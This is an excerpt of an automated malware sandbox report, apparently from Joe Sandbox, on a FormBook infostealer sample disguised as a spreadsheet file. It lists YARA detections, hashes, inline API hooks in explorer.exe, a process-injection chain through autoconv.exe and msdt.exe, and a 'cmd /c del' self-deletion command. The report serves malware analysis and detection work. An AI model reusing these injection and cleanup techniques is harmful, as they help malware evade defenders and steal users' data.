                                    X-XSS-Protection: 1; mode=block
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
                                    X-Permitted-Cross-Domain-Policies: none
                                    X-Dc: gcp-europe-west1
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 68f037069ae042fd-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                    Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                    Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:09:39:45
                                    Start date:15/09/2021
                                    Path:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\PI L032452021xxls.exe'
                                    Imagebase:0x5b0000
                                    File size:722944 bytes
                                    MD5 hash:73C7FDA15888B3B6CC025CE3D5F83161
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:09:39:57
                                    Start date:15/09/2021
                                    Path:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    Imagebase:0x390000
                                    File size:722944 bytes
                                    MD5 hash:73C7FDA15888B3B6CC025CE3D5F83161
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    General

                                    Start time:09:39:58
                                    Start date:15/09/2021
                                    Path:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    Imagebase:0x670000
                                    File size:722944 bytes
                                    MD5 hash:73C7FDA15888B3B6CC025CE3D5F83161
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:09:40:01
                                    Start date:15/09/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6f22f0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:09:40:31
                                    Start date:15/09/2021
                                    Path:C:\Windows\SysWOW64\autoconv.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\SysWOW64\autoconv.exe
                                    Imagebase:0x340000
                                    File size:851968 bytes
                                    MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:09:40:40
                                    Start date:15/09/2021
                                    Path:C:\Windows\SysWOW64\msdt.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                    Imagebase:0x1010000
                                    File size:1508352 bytes
                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:09:40:44
                                    Start date:15/09/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
                                    Imagebase:0x2a0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:09:40:45
                                    Start date:15/09/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff61de10000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >